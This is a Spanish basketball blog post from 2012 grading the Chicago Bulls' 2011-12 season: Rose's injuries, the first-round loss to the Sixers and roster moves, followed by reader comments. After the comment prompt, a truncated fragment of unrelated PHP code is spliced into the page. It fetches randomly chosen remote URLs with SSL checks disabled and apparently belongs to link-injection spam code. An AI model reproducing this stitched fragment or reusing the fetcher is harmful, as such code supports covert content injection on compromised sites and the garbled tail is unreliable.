Chicago Bulls: Aprobado

23 de July de 2012 por Sancho88
Si este resumen hubiera aparecido en el mes de mayo, el día después de la eliminación en primera ronda por 2-4 contra los Sixers, la nota habría sido claramente un suspenso. Pero dicen los expertos que no es bueno analizar las cosas en caliente y por tanto, es necesario en este caso observar la temporada de los Bulls con perspectiva. En el análisis previo, Deer pronosticó que los Bulls igualarían su actuación de la pasada temporada (finales de conferencia). Parecía lógico tener unas altas expectativas dadas las circunstancias. El proyecto estaba construido en torno a las figuras del MVP y el COY de la pasada regular, Derrick Rose y Tom Thibodeau. A su alrededor mucho currante del baloncesto como Asik, Gibson, Watson, Deng o Brewer, dos joyas consolidadas en la pintura como Boozer y Noah, además de dos excelentes tiradores contrastados como RIP Hamilton y Kyle Korver. Como envoltorio, nada mejor que el carácter de equipo imprimido por Thibodeau y la experiencia de haber llegado ya a unas finales de conferencia previamente. Los ingredientes estaban ahí. Sólo faltaba cocinarlos a fuego lento y disfrutar del suculento manjar que nos iban a ofrecer los ‘toretes’ de Chicago. Nada podía fallar. Ahora tocaba saltar a la cancha a disputar el título un año más con los Miami Heat.

A finales de abril todo parecía ir sobre ruedas. El equipo estaba totalmente hecho y había conseguido clasificarse como primero para los Playoffs. Pero he aquí que las cosas se torcieron de la noche a la mañana. Empezaron los fallos en cadena y la revancha contra los Heat no pudo ser debido a la lesión de Rose.

Ciertamente, y a pesar de que todo se truncó en el momento decisivo, hay que decir que la temporada de los Bulls seguramente habría merecido un sobresaliente de haber aguantado Derrick Rose sano. Sin embargo, lo más sencillo a posteriori sería suspenderles tras el gran batacazo en primera ronda pero la debacle en 6 partidos tampoco puede ser el único elemento de juicio para valorar una temporada tan amplia. Sin sus dos jugadores franquicia en la cancha (Rose y Noah), la caída era previsible frente a un fondo de armario tan variado como el de los Sixers, por muy primera ronda que fuese el asunto. Además, un suspenso tampoco tendría en cuenta el extraordinario balance de temporada (50-16), el mejor junto a los Spurs. Entonces, ¿qué habría pasado si en los Spurs se hubieran lesionado Parker y Duncan, por ejemplo? Si los Jazz les hubieran ganado en primera ronda sin sus dos principales espadas, ¿suspenderíamos a los texanos o no? Ese es mi motivo principal para dar al menos el aprobado a los Bulls: las circunstancias de mala suerte sobre todo, y la gran actuación del equipo en la temporada regular.

Hablemos de la Regular entonces.

Siendo breves, los Bulls fueron la mejor defensa del campeonato durante los 66 partidos del curso baloncestístico previos a los Playoffs. Permitieron tan solo 88 puntos de los rivales y eso incluye un trabajo tanto físico como mental de mucho voltaje. En el apartado individual, Rose fue una vez más el líder, aunque no pudo repetir sus números de la pasada campaña. Lo que parecía una nueva lucha de poder a poder con el propio Lebron por el MVP de la regular, tuvo que posponerse para próximas ediciones (y seguramente para más allá del próximo año), debido a las múltiples lesiones de tobillo que lastraron la temporada del base local. Se perdió 26 partidos y esta fue la clave que marcó el rumbo de los Bulls durante todo el año, pero no necesariamente de forma negativa como se podría pensar en un primer momento. Los problemas de Rose se convirtieron en soluciones sobre la cancha, ya que el equipo al completo sumó en conjunto todos o casi todos los números que aportaba Rose de manera individual. Fue excelente comprobar hasta dónde podía llegar el trabajo en equipo. No echaron de menos al líder durante 4 meses. Sí lo harían al final.

No obstante, el propio Rose no estaba contento. Él había declarado que iba a jugar todo el año aguantando los dolores y que más tarde descansaría o se operaría. Pero esto le causó graves consecuencias. La más importante fue el problema con el equipo de fisioterapeutas. Al parecer, los fuertes vendajes que le aplicaban en la previa de los partidos dificultaban y retrasaban la propia recuperación del tobillo. Las sensaciones de Rose no eran buenas y se reflejaban en una disminución de sus estadísticas. El MVP más joven de la historia cayó desde el 26-4-8 de la temporada pasada hasta el 22-3-8 de la actual, que a pesar de seguir siendo grandes números, representaban un escalafón por debajo de su verdadero nivel MVP. Rose prefería jugar con tobilleras que permitieran una mejor rotación de su tobillo a la vez que lo inmovilizaran y protegieran, frente a los vendajes compresores que le aplicaban desde los servicios médicos. Pocos días antes de los Playoffs el base de Chicago explotó en un periódico local cargando contra sus cuidadores por este motivo. ¿Rabieta o realidad? ¿Tenía razón o solamente se basaba en sensaciones subjetivas? Difícil de saber, pero su bajón estadístico ahí está y veremos en qué condiciones vuelve la próxima temporada y si está en disposición de repetir la hazaña numérica de 2011.

Dejando a un lado los problemas del jugador franquicia, los Bulls consiguieron reflejar en las estadísticas lo que mostraban sobre la cancha. Conseguir que tu quinteto rinda como esperas nunca es fácil, pero el quinteto de los Bulls demostró que era de lo mejorcito de toda la NBA y sus cinco jugadores promediaron más de 10 puntos por partido. Eso sí, con Hamilton jugando incluso menos partidos que el propio Rose por su complicada lesión de hombro. Además, desde el banquillo se podía formar otro quinteto igual de solvente que el titular. Eran ellos realmente quienes desequilibraban los marcadores y conseguían mantener una intensidad de juego altísima durante los 48 minutos de partido, lo cual provocaba un desgaste en el rival que terminaba pagando en los últimos minutos. Con Rose-Hamilton-Deng-Boozer-Noah promediando más de 10 puntos por partido y aparentemente sanos para los Playoffs, más Lucas-Watson-Brewer-Korver-Gibson aportando entre 7 y 10 puntos por noche desde el banquillo, la apisonadora roja se disponía a devorar a los volátiles Sixers. Llegaba el momento de la verdad y Chicago salía en todas las quinielas como uno de los tres favoritos al anillo.

Con permiso del propio Deer, y como análisis lógico de la eliminatoria que les enfrentó a los Sixers en primera ronda, éste fue el mejor resumen posible sobre la trayectoria de los Bulls durante el año con la frescura que otorga la inmediatez, el optimismo y el olor a anillo que trasmitía el equipo en aquellos momentos por su gran trabajo durante el año:

“En Chicago, al contrario, no se aprecia ni la más mínima fisura. Han tenido a su MVP Rose en el dique seco 25 partidos y apenas han perdido dos encuentros seguidos una vez en todo el curso. Parecen una versión mejorada de los Sixers y de su defensa hasta se hacen spots televisivos.

Ahora mismo parece complicado que los Sixers estén en condiciones de ganarle algún partido a los Bulls. Mucho tendría que mejorar su ofensiva con respecto a lo visto últimamente. Nos tememos que ni los playoffs son el mejor escenario para ello ni los sistemas de Thibodeau faciliten mucho las cosas en ese sentido”.

Efectivamente, Chicago parecía incorruptible. Jugaban de memoria, con todos los efectivos perfectamente colocados sobre la cancha, con unos balances defensivos difíciles de superar y decenas de posibilidades en el ataque. Era imposible concentrar la defensa sobre los Bulls en uno, dos o tres jugadores en particular. Sencillamente, habían conseguido implicar a todas las piezas de su plantilla y saliera quien saliera siempre daba la sensación de mantener las constantes vitales básicas. A saber: juego en equipo y defensa como modo de vida, elecciones múltiples en el ataque y carácter de ganador en los últimos cuartos.

Así, prever el 2-4 final era imposible. Nadie habría apostado ni un solo euro por los Sixers en condiciones normales. Nadie esperaba la pesada digestión que les esperaba a los Bulls. Al contrario, con ver el primer partido ya nos podíamos hacer una idea del olor a barrida que se barruntaba en la serie. No obstante, la lesión de rodilla de Derrick Rose al final de ese primer partido de la serie (que ya estaba prácticamente decidido) cambió el panorama de manera radical. Las sospechas aparecieron por todos lados y comenzaron a arreciar las críticas al equipo y a Thibodeau por permitir aquella insensatez. Así, la primera victoria no parecía suficiente y muchos vieron ahí una gran oportunidad para los Sixers. El miedo a perder hizo todo lo demás. Más bien, los Bulls no creyeron en sí mismos, no se visualizaron derrotando otras 3 veces a esos timoratos Sixers en 6 partidos. Se les hacía todo muy cuesta arriba, pues no solo era pasar esa eliminatoria, sino vislumbrar otras tres eliminatorias hasta alcanzar el objetivo final del anillo. Y por eso cayeron como cayeron. Fue una mezcla de desidia, de tirar la toalla, de un bajón anímico severo al saber que no tendrían a su líder sobre la cancha. Además, habría que añadir la terrible lesión del tobillo izquierdo que sufrió Joakim Noah en el tercer partido, lo cual añadió un punto más de dramatismo a la historia.

Es decir, los Bulls cayeron sencillamente porque dejaron de creer en sí mismos. ¿Cómo puede ser que durante el año fueran capaces de suplir partido sí, partido también, las continuas bajas de Rose, y en los momentos más complicados claudicaran de manera tan cobarde? Realmente, al conocerse el grave alcance de la lesión de Rose, se puede decir que el equipo se vino abajo definitivamente. Ya no existía esa posibilidad de que tu crack saliera a jugar algunos minutos. Ya no era duda. Directamente no iba a jugar y eso psicológicamente pesó sobre estos chicos, como les pesó a los Wolves la lesión de Ricky. Se encontraron solos ante el peligro y decidieron huir en vez de afrontar de tú a tú los problemas. Luol Deng fue el centro de todos los male, pero Boozer no se quedó muy lejos y los ‘pequeños’ bases empezaron a no jugar todo lo que acostumbraban y a perder la confianza del coach. El resultado de todo esto fue nefasto y Chicago suspendió su particular reválida de manera indigna. Fue un final extraño y calamitoso que no reflejó para nada todo lo positivo que vimos durante el año. Un aprobado por los pelos que deja muy mal sabor de boca.

Moraleja: Aunque el Cid cabalgue solo y muerto, es el Cid, y ya solamente sostenido sobre su montura infunde miedo y respeto. Cuando éste finalmente cae, los moros se percatan de su debilidad y acaban con él y vencen la guerra. Al contrario, los cristianos creyentes que anteriormente lo seguían, al verle muerto y derribado, deciden desertar del campo de fuego, dejando a su líder solo y deshonrando su ausencia. Caballeros cobardes, líder muerto, Chicago triste te me has vuelto…

Lo mejor: El global de la regular, las 50 victorias en 66 partidos y la sensación de gran equipo y juego colectivo antes de los Playoffs.

Lo peor: La lesión de Rose principalmente. Es curioso que el mejor equipo como bloque de la competición terminara echando de menos tanto a su mejor jugador. Es curioso también que los mismos jugadores que rendían con hechuras de campeón durante la regular sin su líder se convirtieran en gatitos indefensos ante un problema que ya habían resuelto con anterioridad. La caída en bloque de los Bulls fue lo peor de la temporada, la gran decepción. Ellos habían inventado el concepto de equipo esta temporada y ellos lo destruyeron. Además, es duro comprobar cómo Carlos Boozer cada día se merece más la amnistía de los Bulls y es muy duro ver en qué ha evolucionado Noah. Lo que parecía una fuerza de la naturaleza imparable en ambos aros, larguiducho y ágil, ahora se ha convertido en un troncho lleno de músculos, con sobrepeso, lento como él solo y falto de todas sus principales cualidades que demostró en los Gators antaño. Su caso es muy similar al de Trunks en Bola de Dragón. Se ‘mazó’ tanto que al final perdió todas sus amenazas. Una lástima. Además, parece que el potencial de los Bulls ha tocado techo. Deng, Noah o Boozer están muy por debajo de su nivel, y lo peor de todo es que parece irreversible. Buscar un año más el anillo con estos jugadores no parece realista.

Jugando al GM:

-Toc, toc. ¿Quién es?

-Hola, yo soy Vladimir Radmanovic. Y yo soy Darko Milicic. Venimos a por un puesto de trabajo.

-Bien, siéntense. ¿De dónde vienen, qué  han venido a hacer aquí?

-Venimos en son de paz. Nos ‘dropeó’ un tal Sancho88 en la Hoops y creemos sinceramente que podemos timar a los Bulls. Tenemos muy buenos representantes y estamos dispuestos usarlos.

-Ok. Contratados. Nos vendrá de lujo tener dos trozos de carne de su calibre. Blancos y con apellidos terminados en –ic. Si ustedes no nos dan el anillo, no se me ocurre nadie más que lo pueda hacer.

Eso por un lado (lo de Milicic no es todavía oficial). Por otro vuelve al equipo Kirk Hinrich vía sign and trade con los Hawks, que reciben a Kyle Korver a cambio. La calidad de Hinrich es indudable, pero físico muy justito para la edad que tiene (32). Ante la salida de CJ Watson jugará minutos de 1 y 2 indistintamente. Junto a Hamilton será una gran amenaza en la batería de escoltas pero igual que R.I.P. las lesiones le han maltratado durante toda su carrera. Veremos qué puede dar.

Omer Asik acaba de renovar con los Bulls, quienes han igualado el 25×3 de los Rockets. Gar Forman consolida el bloque en la zona. No creo que sea la mejor opción.

Sigue el culebrón por Deng. El jugador se quiere quedar, pero entendería que lo traspasaran. Le quedan aún dos temporadas por 27 millones y hay muchos equipos interesados en ficharlo. Aunque en el último mes el asunto se ha enfriado y podría quedarse en los Bulls lo cierto es que equipos como Kings, Warriors, Bobcats y los propios Lakers están detrás de él.

Los Bulls, por otra parte, renunciaron al último año de CJ Watson, quien ha firmado por dos años y el mínimo para veteranos con los Brooklyn Nets. Será el suplente de Williams y el único contrato terrenal del equipo. Por otra parte, John Lucas III ha firmado por los Raptors, pero esta baja no merma para nada el backourt de los Bulls. Rose, Brewer, Hinrich, Marquis Teague y Hamilton completarán la línea exterior. El último en llegar ha sido precisamente Teague, desde los Wildcats de Kentucky. El hermano de Jeff promete, pero muchos lo ven demasiado verde para la NBA a día de hoy.

-Finalmente, solo faltaría por completar el puesto de alero suplente en el equipo. Jimmy Butler jugará más minutos este año previsiblemente, pero se habla del interés por Bellinelli y Michael Redd. Bellinelli sería mi apuesta.

Comenta

16 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Lo de Asik al final ha sido 21,5×3

      Citar

  2. MagicJohnson32 dice:
    #2

    Oye crack, lo de Asik… ¿estás seguro? Creo que no lo han renovado ni tienen intención de hacerlo antes del final del plazo (mañana martes a medianoche, hora de la costa este).

      Citar

  3. Vader dice:
    #3

    Si renuevan a Asik a ver que pasa con Gibson. Los Bulls pueden tener la rotación interior más cara de la NBA…

      Citar

  4. Sancho88 dice:
    #4

    Lo han confirmado en piratasdelbasket y yo lo he visto en rumores este sábado, que Asik re-signed with Bulls… soy muy malo para el inglés, pero creo que eso lo entiendo más o menos…

    http://www.piratasdelbasket.es/html/NBA/movimientos-en-chicago-omer-asik-se-queda-se-piensa-en-marco-belinelli-y-etwaun-moore-y-sigue-la-recuperacion-de-d-rose.html

      Citar

  5. MagicJohnson32 dice:
    #5

    Sancho88:
    Lo han confirmado en piratasdelbasket y yo lo he visto en rumores este sábado, que Asik re-signed with Bulls… soy muy malo para el inglés, pero creo que eso lo entiendo más o menos…

    http://www.piratasdelbasket.es/html/NBA/movimientos-en-chicago-omer-asik-se-queda-se-piensa-en-marco-belinelli-y-etwaun-moore-y-sigue-la-recuperacion-de-d-rose.html

    Pues me sabe mal pero no lo han entendido correctamente. Lo que Asik firmó el viernes fue la offer sheet de los Rockets. A estas alturas no hay respuesta oficial de los Bulls pero han empezado a negociar la ampliación de contrato de Gibson, tienen apalabrado a Nazr Mohammed y están pensando en Milicic, con lo que se da por hecho que no igualarán.

    Por cierto, acabo de leer que están muy cerca de firmar a Belinelli.

      Citar

  6. Sancho88 dice:
    #6

    En realidad la ESPN confirma lo de Mohammed, pero de lo de Asik no hay nada por el momento y dicen que no van a igualar. Puede ser que el redactor de esta página viera el rumor que vi yo, y es que decía claramente que los Bulls habían igualado por Asik… no sé, a ver qué pasa. Lo más lógico sería que lo dejaran marchar, no vale ese dinero ni de coña. Diría que no vale ni la mitad de lo que le van a pagar, pero bueno. Chicago no tiene necesidad de cebarse por un jugador como Asik. Ahora bien, tampoco sé si no habría otras mejores opciones en el mercado que la de Mohammed… además, tampoco ha salido nada más de lo de Pau. Yo pensaba que iban a contraatacar este verano ofreciendo a Deng, Boozer, etc. pero se vé que Lakers prefiere comerse el contrato de Pau que va a rendir más que esos dos… no pinta bien la temporada para los Bulls, no señor

      Citar

  7. MagicJohnson32 dice:
    #7

    Independientemente del tema Asik… muy buen resumen de una temporada extraña para los Bulls, muy por encima de las expectativas, y más teniendo en cuenta las lesiones de Rose, y que acabó de mala manera. Como bien dices, dejaron de creer en sí mismos. Y la verdad es que entiendo que ver cómo se lesione tu jugador franquicia en el primer partido de Playoffs debe de ser un palo muy duro.

    Sobre el futuro… son 4 años más de Noah, 3 de Boozer y 2 de Deng, demasiado dinero invertido en jugadores que no marcan diferencias, poco más que buenos acompañantes.

      Citar

  8. HisRoyalAirness dice:
    #8

    Sancho, creo que al principio hay una errata. Pusiste que Boozer es una joya y creo que querías poner paquete sobrevalorado

      Citar

  9. Sancho88 dice:
    #9

    Sí, y además que aparte de Rose no se intuye liderazgo por ningún sitio. Noah no lo ha trabajado, pero podría haber llegado a ser un pívot referente en la liga, Boozer está cuesta abajo y sin frenos y Deng ídem. Hamilton todavía puede hacer algo, pero las lesiones no le dejan. Con RIP y Rose sanos aún pueden intentar un asalto más al anillo, pero creo que han perdido todo el factor sopresa y quizá les hinchamos todos las posibilidades tb. Yo no voy a negar que pensaba en ellos como los favoritos detrás de Spurs y Thunder para el anillo, y por delante de MIami, al menos en la previa de los playoffs. Aunque tb todos asumimos que el batacazo iba a suceder tras la lesión de Rose. El problema no fue ese, sino que ellos tb lo asumieron que iban a caer… lo cual tiene delito. Qué poco espíritu y madera de campeón demostraron tener… Al final, lo que va a ocurrir es que Rose va a pedir una millonada o amenazará con irse a equipos como Mavericks, Lakers… porque en Chicago no le pueden ofrecer garantías de luchar por el título con esos contratos tan largos, tóxicos e improductivos. Por eso digo que Boozer para mí tiene el cartelito de amnistía en la frente. Si los Bulls quieren retener a Rose, más les valdría moverse rápido. Quizá este verano no sea el definitivo y sí lo sea el que viene, pero algo han de hacer seguro

      Citar

  10. Sancho88 dice:
    #10

    hombre, no, HisRoyal, lo digo por cómo se vendió a los Bulls desde todos los medios. En muchos análisis se dijo que Boozer-Noah era la mejor pareja de interiores en el Este, y mira lo que han demostrado… de todas maneras, hasta hace dos añitos en la época de los Jazz Boozer sí que era una estrella a mi juicio, y los Bulls no se equivocaron contratándole, pero ahora está hecho un trapico y merece la amnistía. A priori yo creo que todos coincidiamos en ver a Boozer-Noah como una gran pareja en la pintura no?

      Citar

  11. HisRoyalAirness dice:
    #11

    Bueno, yo concretamente siempre he echado pestes de Boozer. En Utah hacía números, luego llegaban los PO y era la mentable, cumplía con sus rebotitos (en defensa) y tenía menos sangre y ganas de ganar que nadie. Se supone que es el segundo espada de los Bulls y le da igual. Es un tipo como Stoudamire, me pone malo.
    El que dijese que Noah-Boozer era el mejor juego interior del Este sería por dos motivos: bien porque asumió que el resto de pivots son una mierda o bien estaba bajo los efectos de alguna sustancia psicotròpica que le entró muy mal.
    Noah es un tipo peleón, trabajador y muy útil pero es un jugador LIMITADISIMO. El juego interior de Indiana, por supuesto Celtics (sólo con KG) o Stoudamire Chandler( que también me parecen otra band) me parecen bastante superiores.

      Citar

  12. Esteban dice:
    #12

    los bulls deberian intentar traspasar a deng por algun joven, BARNES? gsw estuvo interesado en deng y creo que seria beneficioso para los bulls

    este año chicago, sin rose, no andara muy por alla, seria entonces inteligente, aprovecharlo de otra forma, darle el año a barnes para que se fogue y cuando vuelva rose ya este consolidado, los bulls no tendran muchas formas de reforzar su equipo, sus unicos valores de mercado son noah, rose y deng,

    rose es una generacion menos que el resto del equipo, en unos 3 o 4 años, podria encontrarse en el mismisimo limbo que estuvieron los heat cuando sus campeones se retiraron y dejaron a wade 4 años a la deriva

    yo me la hubiese jugado con este equipo otro año mas, pero sin rose, es tirar a la basura dinero y activos, por que sin rose no terminaran mas que primera ronda y con el, depende como este, tampoco los veo siendo un rival del heat, boozer y hamilton esta año estaran peor que la temporada pasada, y ya han perdido valores que rindieron de sobremanera el año pasado

    barnes por deng, y amnistia a boozer, y arrancar de 0, la pasarian muy mal este año, pero el proximo ya estaria rose, barnes estaria en su segundo año y tendrian una eleccion de darft alta, mas cierta comodidad salarial

      Citar

  13. HisRoyalAirness dice:
    #13

    Los bulls lo que deberíanes pescar a Bynum o Howard. Lo llevo diciendo un año

      Citar

  14. Esteban dice:
    #14

    Deng y noah por bynum cerraria de lujo, yo lo haria de ambas partes, aunque si fuera bull lo pensaria mucho igual

      Citar

  15. nach dice:
    #15

    Si amnistian a Boozer podrían ir a por Howard en verano?

      Citar

  16. Esteban dice:
    #16

    nach:
    Si amnistian a Boozer podrían ir a por Howard en verano?

    no no tendrian suficiente espacio para fichar un jugador de 20 millones desde la agencia libre, si podria haber un trade, a modo de ejmplo deng y noha por howard

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>